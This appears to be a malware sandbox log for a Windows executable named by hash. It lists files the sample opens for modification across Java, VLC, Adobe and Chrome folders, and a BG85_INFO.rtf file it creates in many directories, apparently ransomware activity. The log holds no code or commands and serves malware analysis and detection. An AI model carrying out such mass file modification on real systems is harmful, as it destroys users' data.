C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\flavormap.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-6 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\dnsns.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Andorra c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Casablanca c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\ResumeTest.AAC c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Karachi c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Amman c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Jujuy c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Krasnoyarsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansDemiBold.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Midway c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Damascus c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tegucigalpa c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ja.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Johannesburg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.bat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\zipfs.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Samarkand c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Cordoba c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ar.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Winnipeg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sr.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Rangoon c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\include\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-10 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-13 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\SaveInvoke.dib c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfxrt.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif 